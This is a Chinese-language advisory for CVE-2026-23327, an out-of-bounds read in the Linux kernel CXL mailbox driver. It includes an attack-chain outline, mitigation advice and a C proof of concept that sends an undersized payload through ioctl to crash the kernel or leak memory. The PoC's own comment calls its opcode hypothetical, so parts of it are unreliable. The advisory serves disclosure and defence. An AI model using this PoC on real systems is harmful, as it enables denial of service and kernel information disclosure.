CVE-2026-23327 CVSS 7.1 高危

CVE-2026-23327 Linux内核CXL邮箱越界读取漏洞

披露日期: 2026-03-25

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-23327

漏洞类型

越界读取

CVSS评分

7.1 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核CXL驱动组件存在安全漏洞。`cxl_payload_from_user_allowed`函数在处理用户输入时，未对载荷大小进行校验便直接调用`uuid_equal`读取数据。本地攻击者可利用此缺陷发送构造的小尺寸载荷，触发内存越界访问，引发内核崩溃或信息泄露风险。

技术细节

漏洞源于Linux内核drivers/cxl/core/mbox.c文件中的逻辑缺陷。在处理原始邮箱命令（如CXL_MBOX_OP_CLEAR_LOG）时，`cxl_payload_from_user_allowed`函数未预先验证payload的大小是否满足最小要求（例如UUID操作需要16字节）。如果攻击者发送一个过小的payload（如1字节），`uuid_equal`函数在执行memcmp时将读取超出已分配缓冲区边界的内存。这触发了KASAN（内核地址消毒剂）的slab-out-of-bounds检测，导致内核恐慌（Kernel Panic）或系统拒绝服务，并可能泄露敏感的内核内存信息。

攻击链分析

STEP 1

侦察

攻击者确认目标系统运行存在漏洞的Linux内核版本，并且加载了CXL驱动模块。

STEP 2

准备载荷

攻击者编写程序，针对CXL_MBOX_OP_CLEAR_LOG等命令，构造大小不足的载荷（例如1字节）。

STEP 3

触发漏洞

本地低权限用户运行恶意程序，通过ioctl系统调用向内核发送带有小载荷的命令。

STEP 4

执行攻击

内核在未校验大小的情况下调用uuid_equal读取内存，触发越界访问，导致内核崩溃或信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC Code for CVE-2026-23327
// Requires a CXL device or emulator
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <string.h>

#define CXL_MEM_SEND_COMMAND _IOWR('C', 0x10, struct cxl_send_command)
#define CXL_MBOX_OP_CLEAR_LOG 0x4001 // Hypothetical opcode for demo

struct cxl_send_command {
    __u64 id;
    __u16 opcode;
    __u16 flags;
    __u32 rsvd;
    __u64 payload_in;
    __u32 payload_in_size;
    __u32 payload_out_size;
    __u64 payload_out;
    __u64 rsvd2[3];
};

int main() {
    int fd = open("/dev/cxl_mem0", O_RDWR);
    if (fd < 0) {
        perror("Failed to open device");
        return 1;
    }

    // Prepare undersized payload (1 byte instead of 16 for UUID)
    char *payload = malloc(1);
    memset(payload, 0x41, 1);

    struct cxl_send_command cmd = {0};
    cmd.opcode = CXL_MBOX_OP_CLEAR_LOG;
    cmd.payload_in = (__u64)payload;
    cmd.payload_in_size = 1; // Trigger vulnerability

    printf("Sending malicious payload...\n");
    if (ioctl(fd, CXL_MEM_SEND_COMMAND, &cmd) < 0) {
        perror("IOCTL failed");
    }

    free(payload);
    close(fd);
    return 0;
}

影响范围

Linux Kernel (versions prior to patch including commit 60b5d1f68338aff2c5af0113f04aefa7169c50c2)

防御指南

临时缓解措施

如果无法立即升级内核，建议禁用CXL硬件支持或严格限制对/dev/cxl设备的访问权限，仅允许受信任的用户或系统进程进行交互。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表